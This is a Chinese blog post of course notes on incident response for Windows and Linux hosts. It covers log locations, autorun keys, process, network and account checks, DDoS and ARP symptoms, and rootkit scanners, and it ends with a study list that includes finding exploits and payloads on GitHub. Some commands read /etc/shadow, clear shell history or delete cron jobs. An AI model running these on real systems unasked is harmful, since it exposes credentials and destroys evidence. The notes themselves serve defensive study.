<p>路由器交换机攻击</p>
<p>内网病毒，配置错误，机器本身漏洞</p>
<hr>
<h3 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h3><p>日志查看</p>
<p>eventvwr.msc打开</p>
<p>windows日志位置</p>
<p>windows2000/2003/xp</p>
<p>%Systemroot%\System32\Config*.evt</p>
<p>windows vista/7/8++++</p>
<p>%Systemroot%\System32\winevt\Logs*.evtx</p>
<hr>
<p>检查账户</p>
<p>文件分析</p>
<p>临时目录</p>
<p>tmp/temp/回收站</p>
<p> C:\Users\Administrator\Local Settings\Temp</p>
<p>文件修改时间</p>
<p>hosts文件</p>
<hr>
<p>网络行为排查</p>
<p><a target="_blank" rel="noopener" href="http://www.virustotal.com/">www.virustotal.com</a></p>
<p>微步</p>
<p>beian.cndns.com</p>
<p>google/baidu</p>
<p>网络连接排查</p>
<p>netstat -ano</p>
<p>tasklist</p>
<p>流量分析</p>
<p>wireshark，charles</p>
<p>主机访问 xx123.3322.org </p>
<hr>
<p>漏洞和补丁信息</p>
<p>命令systeminfo</p>
<p>打开Windows自动更新</p>
<hr>
<p>ddos通用防御：</p>
<p>限制单ip请求，负载均衡，cdn，禁止icmp，隐藏真实ip，流量清洗</p>
<p>优化tcp/ip栈，代码合理使用缓存，cdn云清洗</p>
<p>syn攻击判断：</p>
<p>服务器cpu占用率高</p>
<p>大量SYN_RECEIVED网络连接状态</p>
<p>网络恢复后，负载瞬间变高，断开后负载下降</p>
<p>udp攻击判断：</p>
<p>服务器cpu占用率高</p>
<p>每秒大量数据包</p>
<p>tcp正常</p>
<p>CC攻击：</p>
<p>服务器cpu占用率高</p>
<p>web服务器出现service unavailable提示</p>
<p>大量establish网络连接，单ip高达上百，用户无法正常访问</p>
<p>syn+ack防御：</p>
<p>提高半开放连接队列的大小</p>
<p>/proc/sys/net/ipv4/tcp_max_syn_backlog</p>
<p>dns放大攻击：</p>
<p>大量的dns请求</p>
<p>防御：ips规则，关闭递归查询，dns解析器只接受受信任的域名服务，acl</p>
<hr>
<p>arp欺骗判断：</p>
<p>arp -a 查看mac地址是否重复</p>
<p>防御：</p>
<p>防火墙，mac地址绑定</p>
<hr>
<p>可疑进程分析</p>
<p>pchunter</p>
<p>tasklist | findstr 进程id </p>
<p>wmic process | find “进程id” &gt; proc.csv</p>
<p>tasklist /svc</p>
<hr>
<p>启动项排查</p>
<p> win+R regedit </p>
<p>HKLM\SOFTWARE\Microsoft\Windows\Currentversion\Run</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\Currentversion\Polices\Run</p>
<p>HKLM\SOFTWARE\Microsoft\WindowsNT\Currentversion\Run</p>
<p>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</p>
<p>C:\Windwos\Tasks</p>
<hr>
<p>计划任务</p>
<hr>
<p>特定事件痕迹 </p>
<p>挖矿程序 </p>
<p>勒索病毒</p>
<p>qq.exe—–&gt;qq.exe.xx</p>
<p>file.docx—-&gt;file.docx.xx</p>
<p>linux应急响应 </p>
<p>ifconfig </p>
<p>top -c -o %CPU</p>
<p>-c 显示进程的命令行</p>
<p>-p 显示进程的pid</p>
<p>ps -eo pid,ppid,%mem,%cpu,cmd –sort=-%cpu | head -n 5</p>
<p>cpu占用前5的信息</p>
<p>lsof -i -PnR</p>
<p>查看网络通信的情况</p>
<p>ps aux | grep [pid]</p>
<p>寻找pid对应的进程</p>
<p>lsof -p [pid]</p>
<p>查看进程打开的文件</p>
<p>md5sum [文件名]</p>
<p>计算文件的md5值</p>
<hr>
<p>安全事件处置：</p>
<p>webshell查杀</p>
<p><a target="_blank" rel="noopener" href="http://www.shellpub.com/">www.shellpub.com</a></p>
<p>病毒/rootkit查杀</p>
<p><a target="_blank" rel="noopener" href="http://www.chkrootkit.org/">www.chkrootkit.org</a></p>
<p>综合查杀工具</p>
<p><a target="_blank" rel="noopener" href="http://www.xmirror.cn/page/prodon">www.xmirror.cn/page/prodon</a></p>
<p>通常情况下linux的恶意程序处置，靠人工解决</p>
<hr>
<p>chkrootkit功能: </p>
<p>检测是否被植入后门、木马、rootkit </p>
<p>检测系统命令是否正常 </p>
<p>检测登录日志 </p>
<p>使用方法: </p>
<p>wget <a href="ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz">ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz</a> </p>
<p>tar zxvf chkrootkit.tar.gz </p>
<p>cd chkrootkit-0.52 </p>
<p>make sense </p>
<p>编译完成没有报错的话执行检查 </p>
<p>./chkrootkit </p>
<hr>
<p>Linux下常用安全工具 </p>
<p>rkhunter功能: </p>
<p>系统命令(Binary)检测，包括Md5 校验 </p>
<p>Rootkit检测 </p>
<p>本机敏感目录、系统配置、服务及套间异常检测 </p>
<p>三方应用版本检测 </p>
<p>使用方法: </p>
<p>Wget <a target="_blank" rel="noopener" href="https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz">https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz</a> tar -zxvf rkhunter-1.4.4.tar.gz </p>
<p>cd rkhunter-1.4.4 </p>
<p>./installer.sh –install </p>
<p>rkhunter -c </p>
<hr>
<p>网络行为分析</p>
<p>系统信息</p>
<p>who</p>
<p>查看系统信息</p>
<p>uname -a</p>
<p>netstat -ano查看网络和端口情况</p>
<p>netstat -utnpl</p>
<p>arp -a 查看arp表</p>
<p>lsof -i :[port]</p>
<p>显示进程和端口的对应关系</p>
<p>ls -l /proc/[pid]/exe</p>
<p>file /proc/[pid]/exe</p>
<p>某个pid对应的文件路径</p>
<p>使用iptables屏蔽ip</p>
<p>iptables -A INPUT/OUTPUT -s/d [目标ip] -j ACCEPT/DROP</p>
<p>用iptables封锁和x.com的域名通信</p>
<p>iptables -I INPUT -p tcp –dport 80 -m string –string “x.com” –algo bm -j DROP </p>
<hr>
<p>进程检查</p>
<p>ps -aux</p>
<p>ps -ef</p>
<p>top -c</p>
<p>lsof -p [pid]</p>
<p>lsof -i :[port]</p>
<p>lsof -c </p>
<p>lsof eval.sh 查看文件占用</p>
<p>ps -ef | awk ‘{print}’ | sort -n | uniq &gt;1</p>
<p>ls /proc | sort -n | uniq &gt;2</p>
<p>diff 1 2</p>
<hr>
<p>启动项排查</p>
<p>/etc/init.d/</p>
<p>/etc/xinetd.d/</p>
<p>查看rc.local文件(/etc/init.d/rc.local)</p>
<p>/etc/rc.d/rc[0-6].d/</p>
<p>/etc/profile.d/</p>
<hr>
<p>计划任务：</p>
<p>cron</p>
<p>/etc/crontab</p>
<p>/var/spool/cron/[用户名]</p>
<p>crontab -l 查看计划任务</p>
<p>crontab -r 删除计划任务</p>
<p>crontab -e 使用编辑器编辑计划任务</p>
<p>/var/spool/cron/*</p>
<p>/var/spool/anacron/*</p>
<p>/etc/crontab/*</p>
<p>/etc/cron.d/*</p>
<p>/etc/cron.时间/*</p>
<hr>
<p>服务排查</p>
<p>cat /etc/services</p>
<p>查看网络服务</p>
<p>1-1024 系统保留，只能root使用</p>
<p>1025-4999 客户端程序自由分配</p>
<p>5000-65535 服务器端程序自由分配</p>
<p>服务自动启动</p>
<p>chkconfig –level [运行级别] [服务名] [on/off]</p>
<p>chkconfig –level 2345 httpd on 开启自启动 = chkconfig httpd on</p>
<p>0 - 关机</p>
<p>1 - 单用户模式</p>
<p>2 - 无网络连接的多用户命令行模式</p>
<p>3 - 有网络连接的多用户命令行模式</p>
<p>4 - 不可用</p>
<p>5 - 图形界面多用户模式</p>
<p>6 - 重启</p>
<p>chkconfig –list 查看服务自启动状态</p>
<p>chkconfig –del 删除相关服务</p>
<hr>
<p>文件检查</p>
<p>webshell后门可以通过sftp复制出来</p>
<p>敏感目录文件分析</p>
<p>/etc/init.d</p>
<p>/usr/bin</p>
<p>/usr/sbin</p>
<p>ls -alt 时间排序</p>
<p>file [文件]</p>
<p>特殊权限文件查找</p>
<p>find / *.jsp -perm 4777</p>
<p>隐藏文件 .开头的文件隐藏属性</p>
<p>ls -al /tmp | grep “Feb 10”</p>
<p>敏感目录</p>
<p>/tmp</p>
<p>/root</p>
<p>/bin</p>
<p>/usr/bin</p>
<p>/usr/sbin</p>
<p>/sbin</p>
<p>被入侵的系统，肯定有文件被改动，通过比较文件的md5，创建时间，文件路径</p>
<p>find / -uid 0 -print 查找特权文件</p>
<p>find / -size +10000k -print</p>
<p>find / -name “…” -print</p>
<p>md5sum -b [文件名]</p>
<p>whereis [文件名]</p>
<hr>
<p>账号检查</p>
<p>w 查看系统信息</p>
<p>cat /etc/passwd 用户信息文件</p>
<p>cat /etc/shadow 用户密码</p>
<p>less /etc/passwd</p>
<p>ls -l /etc/passwd 查看文件修改时间</p>
<p>usermod -L [user] 锁定用户 -U 解锁用户</p>
<p>userdel [user] 删除用户</p>
<p>userdel -r [user] 删除用户和他的home</p>
<p>用户登录检查</p>
<p>last</p>
<p>数据源/var/log/wtmp /var/log/btmp</p>
<p>lastb</p>
<p>数据源/var/log/btmp</p>
<p>lastlog</p>
<p>/var/log/lastlog</p>
<p>last -x reboot</p>
<p>last -x shutdown</p>
<p>/var/log/lastlog /var/log/secure</p>
<p>/var/log/message 存储认证信息，追踪恶意用户登录行为</p>
<hr>
<p>历史命令</p>
<p>history</p>
<p>history -c 清除</p>
<hr>
<p>日志分析</p>
<p>默认日志/var/log/</p>
<p>more /etc/rsyslog.conf 查看日志情况</p>
<h1 id="任务"><a href="#任务" class="headerlink" title="任务"></a>任务</h1><p>1.掌握burp，charles使用</p>
<p>2.掌握charles的手机抓包</p>
<p>3.<a target="_blank" rel="noopener" href="https://www.runoob.com/">https://www.runoob.com/</a></p>
<p>学习runoob里的html内容，全部尝试一下</p>
<p>4.百度一下常用端口</p>
<p>再查查这个端口所代表的服务内容</p>
<p>5.tcp三次握手和四次挥手原理</p>
<p>6.了解tcp udp协议</p>
<p>7.了解多个windows server系统如何搭建域环境</p>
<p>windows server 2012 &amp; windows server 2008 &amp; windows server 2003</p>
<p>8.runoob上的javascript搞定</p>
<p>9.了解vmware kvm xen openvz ———————虚拟化技术</p>
<p>openstack ——虚拟化管理平台</p>
<p>docker     virtual pc</p>
<p>10.runoob的php    开始看runoob的mysql</p>
<p>11.github—-查找windows exploit</p>
<p>12.注册github账号，并且在了解代码之后，自己写代码到GitHub上</p>
<p>在GitHub上搜“windows 提权”</p>
<p>Windows exploit</p>
<p>Python payload</p>
<p>13.每个人注册一个telegram账号</p>
<hr>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/01/01/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BE%AE%E4%B8%93%E4%B8%9A/" data-id="clchcsdwt0002agth9m1i9gps" class="article-share-link">
        Share
      </a>
      
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BE%AE%E4%B8%93%E4%B8%9A%E7%AC%94%E8%AE%B0/" rel="tag">渗透测试微专业笔记</a></li></ul>

    </footer>

  </div>

  
  
<nav class="article-nav">
  
  <a href="/2023/01/04/CISP-PTE/" class="article-nav-link">
    <strong class="article-nav-caption">Newer</strong>
    <div class="article-nav-title">
      
      (no title)
      
    </div>
  </a>
  
  
  <a href="/2022/12/03/hello-world/" class="article-nav-link">
    <strong class="article-nav-caption">Older</strong>
    <div class="article-nav-title">Hello World</div>
  </a>
  
</nav>

  

  
  
  
  

</article>
</section>
    <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>Fzzf&#39;s blog &copy; 2023</li>
      
        <li>
          
            <a href="https://beian.miit.gov.cn/" target="_blank"></a>
            
        </li>
      
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>theme  <a target="_blank" rel="noopener" href="https://github.com/zhwangart/hexo-theme-ocean">Ocean</a></li>
    </ul>
    <p><ul class="list-inline">
  
  <li><i class="fe fe-smile-alt tooltip" data-tooltip="UV"></i> <span id="busuanzi_value_site_uv"></span></li>
  
  <li><i class="fe fe-bookmark tooltip" data-tooltip="PV"></i> <span id="busuanzi_value_page_pv"></span></li>
  
</ul></p>
  </div>
</footer>
  </main>
  <aside class="sidebar">
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/hexo.svg" alt="Fzzf&#39;s blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">Home</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">Archives</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/gallery">Gallery</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">About</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="fe fe-feed"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>



<script src="/fancybox/jquery.fancybox.min.js"></script>





<script src="/js/tocbot.min.js"></script>


<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
  });
</script>



<script src="/js/ocean.js"></script>

</body>

</html>